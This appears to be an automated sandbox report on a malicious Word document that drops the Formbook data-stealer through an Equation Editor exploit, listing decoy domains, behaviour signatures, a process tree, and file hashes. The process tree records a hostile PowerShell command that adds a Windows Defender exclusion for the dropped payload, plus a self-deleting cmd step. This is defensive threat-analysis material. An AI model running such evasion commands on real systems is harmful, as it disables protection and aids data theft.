Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    15-07-2024 12:37

General

  • Target

    837216bb9f9cda26fbebd58a078b6b16.docx

  • Size

    16KB

  • MD5

    837216bb9f9cda26fbebd58a078b6b16

  • SHA1

    f8f72e714188e1f6afd09f7b7841437a5e8aee80

  • SHA256

    007be9a71495d3adced6a8ff24250aa044384df75b9149b4fdcd9d3b8b609ed7

  • SHA512

    14b72385cf8b462e8425d522368426f10dcab06b5b1be1cb1bf7ca3aad799545cd9f661c38ebafce9d478f1dec36b0324cdfd81695d2a7ec60bbb2aeefbb7624

  • SSDEEP

    384:YyXg0/+HWos8PL8wi4OEwH8TIbE91r2fR4JYHviMvmbWNv:Ycg0SP5P3DOqnYJ22vlvmbWJ

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

oi12

Decoy

exobello.bio

boinga.xyz

animasriversurf.com

gamesflashg.com

hayatbagievleri.online

washington-living.com

july7.store

x-pod-technologies.com

farmhouseflaire.com

qb52aa.top

datasynthing.xyz

5v28n.rest

legacycommerceltd.com

mundodelosjuguetes.com

wjblades.com

z9b6g8.com

eskimotech.net

dreziuy.xyz

bestsolarcompanies.services

vertemisconsulting.com

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Formbook payload 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Abuses OpenXML format to download file from external location
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1244
    • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\837216bb9f9cda26fbebd58a078b6b16.docx"
      2⤵
      • Drops file in Windows directory
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3016
      • C:\Windows\splwow64.exe
        C:\Windows\splwow64.exe 12288
        3⤵
          PID:1384
      • C:\Windows\SysWOW64\autochk.exe
        "C:\Windows\SysWOW64\autochk.exe"
        2⤵
          PID:1084
        • C:\Windows\SysWOW64\cmstp.exe
          "C:\Windows\SysWOW64\cmstp.exe"
          2⤵
          • Blocklisted process makes network request
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1480
          • C:\Windows\SysWOW64\cmd.exe
            /c del "C:\Users\Admin\AppData\Roaming\obi39199.scr"
            3⤵
              PID:984
        • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          1⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Launches Equation Editor
          • Suspicious use of WriteProcessMemory
          PID:3044
          • C:\Users\Admin\AppData\Roaming\obi39199.scr
            "C:\Users\Admin\AppData\Roaming\obi39199.scr"
            2⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:2804
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\obi39199.scr"
              3⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:448
            • C:\Users\Admin\AppData\Roaming\obi39199.scr
              "C:\Users\Admin\AppData\Roaming\obi39199.scr"
              3⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of AdjustPrivilegeToken
              PID:2312

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

          Filesize

          1KB

          MD5

          7fb5fa1534dcf77f2125b2403b30a0ee

          SHA1

          365d96812a69ac0a4611ea4b70a3f306576cc3ea

          SHA256

          33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

          SHA512

          a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

          Filesize

          436B

          MD5

          1bfe0a81db078ea084ff82fe545176fe

          SHA1

          50b116f578bd272922fa8eae94f7b02fd3b88384

          SHA256

          5ba8817f13eee00e75158bad93076ab474a068c6b52686579e0f728fda68499f

          SHA512

          37c582f3f09f8d80529608c09041295d1644bcc9de6fb8c4669b05339b0dd870f9525abc5eed53ad06a94b51441275504bc943c336c5beb63b53460ba836ca8d

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

          Filesize

          174B

          MD5

          34c4241e2d3c7d32eca4cb4dd1d1cf2a

          SHA1

          ea6b55e8a5e9f99e014e4e830b14ab9b19c6a672

          SHA256

          a3f3414ce8b28afc0fa97aa23f588fbd05b0d9660bfd8f899fc6b00f98083407

          SHA512

          9c658e8f8d3323a355988f7d591af7885f87973fa8087494f14737c67cfd398a6e4c1bc42f5eb3b73cc0de3bf1ba7984c179227f78b844b8b734ff6d19f559a3

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

          Filesize

          170B

          MD5

          675e285a7edb106b0c4aa0e0bbad339b

          SHA1

          4f06df75813df8d2e711ccfb413d44369e9b144f

          SHA256

          903e925c2a7c1c8fdecff4a4646418b7f55a313d0e0ef41b443bc47421ac50fc

          SHA512

          403300bd6974ea7916479a2918fe9c6080f36c558191d08894f11875df4415a6dbe3cbad7e26e4d7021eba1a5b7511b18ffe0e558b7f337e0f2024bd1e095b9c

        • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{D24677F9-11D2-4BFA-A366-B79F016AB727}.FSD

          Filesize

          128KB

          MD5

          07a17a1326fcd38fa15f275c55db9e02

          SHA1

          f68009ad08ca5e7f8f11ebf2475ef5d4d12ef7b1

          SHA256

          2c99fcf183315be27493676c19c58ca390bed5100f505cd6bbda66055c0829c2

          SHA512

          de681f4cb268637ac87d62b49b8c4c45f7c309e20d67910b63480947c2bc512f761c6e63c826468861b709efa084d6ddb50aba4bbbb6500c781f048f80bfb0dc

        • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

          Filesize

          128KB

          MD5

          77f2c7c46ec26da3f64337b8d7e10503

          SHA1

          33f371fb767ff9ca8e530ea6f5f9d8bbd90835cb

          SHA256

          16051cd9138bf983475cb58b0aaed58b7ba6d848fe8fe92ed69d096228b2f2dd

          SHA512

          61195ee5c7d6dcb83cdf083ba2f640039057a25ad312dc4000c6f2a795bcca14e69bb734ac63d3cfd8ec2c111b7de7dbf2409af4e5b666c83f5d22ed402b7ac7

        • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{1F02B14F-3D54-4AFF-9D2E-B08A4A2F1E20}.FSD

          Filesize

          128KB

          MD5

          784fc7d54aec20f06176162e2c9c8984

          SHA1

          f8658cde004cb55ef6f8af0586523fc888f1ba06

          SHA256

          8ae1189d9290639bc26350b213de491a86f3f297db3d39c46740dd905d8e9f1a

          SHA512

          2cc05aad0d31ac73d8d28600e78710689cf1bbe0871f2ae3702e797c07b351ada69216ab774bacaba36e5722b854814456e7c14827a2445a4855b25074cc8c7f

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5J67VDZD\orb[1].doc

          Filesize

          592KB

          MD5

          2ba92be429cdd63c858fa913c4330e03

          SHA1

          e636674e6ae85009963aac1769dd9330162f2c1b

          SHA256

          89d4f7ff0f7581285aa90f39213b779edabda6196b48bc386131d71f64b52548

          SHA512

          cf92cba7448c78c2798c5f5a4a13891e0fe8a2929f7819969424e54bba119c9ce2a2c1310b0621ca0528f2dd57837cc2d08848151cfe4193c90a5a92dd4fbea5

        • C:\Users\Admin\AppData\Local\Temp\CabC02.tmp

          Filesize

          70KB

          MD5

          49aebf8cbd62d92ac215b2923fb1b9f5

          SHA1

          1723be06719828dda65ad804298d0431f6aff976

          SHA256

          b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

          SHA512

          bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

        • C:\Users\Admin\AppData\Local\Temp\{7A9EF1EB-BD86-4DBC-A007-B61E7E4DB7FA}

          Filesize

          128KB

          MD5

          ce15c2221ebc2de39f051bf35fba1f82

          SHA1

          4c4e4436d365a975aca0d84a6fe49df8e466c1b6

          SHA256

          ccb7de4359d9f1c6f501028f9469029a313826509a007fd4e77ca6ab46d8d079

          SHA512

          669e415e9a3e04ec343c561e0241fb6bffb22357110798023bdae4394ef94fea341bc360ea9fe8a516d9ad1a77ad1d66aa1821a9e53ebc9a4e7ce66f18d302b8

        • C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

          Filesize

          253B

          MD5

          2d35132d09d053542e46267beb82214c

          SHA1

          2060db06fd9aba87fc74de4417a311aee66e653d

          SHA256

          110d85ee240580609b90ae8dc261a8d9136e32673b008c3f7946a6beab9ca479

          SHA512

          0f3c3677a96d5afa6d53d31ca06ee63589d5d3de53933fb6a30c11dff64716f4dee6155e4000f30ba7bc9dc5db90a158f88c36c0efa10c845e16e5b4337a6a06

        • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

          Filesize

          2B

          MD5

          f3b25701fe362ec84616a93a45ce9998

          SHA1

          d62636d8caec13f04e28442a0a6fa1afeb024bbb

          SHA256

          b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

          SHA512

          98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

        • \Users\Admin\AppData\Roaming\obi39199.scr

          Filesize

          641KB

          MD5

          5bb28f55f7e40a6fc139ab8855a2f4f1

          SHA1

          30e79283844d61aaf849465d5755d0766daa10b6

          SHA256

          4f0c6fbe81af5502a29f6e8f0126f213498c24531e80512d1966f773d5131365

          SHA512

          72d969877392a06f00f8e8f2f12278ba51ca55938227b2d1efed7bffbd953f1657afa0fcf1fd21d8e50f5ec716cc60c0c4e87a2341f63bee7bde0de0a42dfd94

        • memory/1244-153-0x0000000006520000-0x00000000065BD000-memory.dmp

          Filesize

          628KB

        • memory/1480-148-0x00000000000D0000-0x00000000000FF000-memory.dmp

          Filesize

          188KB

        • memory/1480-147-0x0000000000E30000-0x0000000000E48000-memory.dmp

          Filesize

          96KB

        • memory/2312-137-0x0000000000400000-0x000000000042F000-memory.dmp

          Filesize

          188KB

        • memory/2312-141-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

          Filesize

          4KB

        • memory/2312-142-0x0000000000400000-0x000000000042F000-memory.dmp

          Filesize

          188KB

        • memory/2312-139-0x0000000000400000-0x000000000042F000-memory.dmp

          Filesize

          188KB

        • memory/2804-119-0x0000000000820000-0x00000000008C4000-memory.dmp

          Filesize

          656KB

        • memory/2804-136-0x0000000004B50000-0x0000000004BC6000-memory.dmp

          Filesize

          472KB

        • memory/2804-135-0x0000000000540000-0x000000000054E000-memory.dmp

          Filesize

          56KB

        • memory/2804-124-0x0000000000520000-0x000000000053A000-memory.dmp

          Filesize

          104KB

        • memory/3016-2-0x000000007169D000-0x00000000716A8000-memory.dmp

          Filesize

          44KB

        • memory/3016-0-0x000000002F4E1000-0x000000002F4E2000-memory.dmp

          Filesize

          4KB

        • memory/3016-149-0x000000007169D000-0x00000000716A8000-memory.dmp

          Filesize

          44KB

        • memory/3016-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

          Filesize

          64KB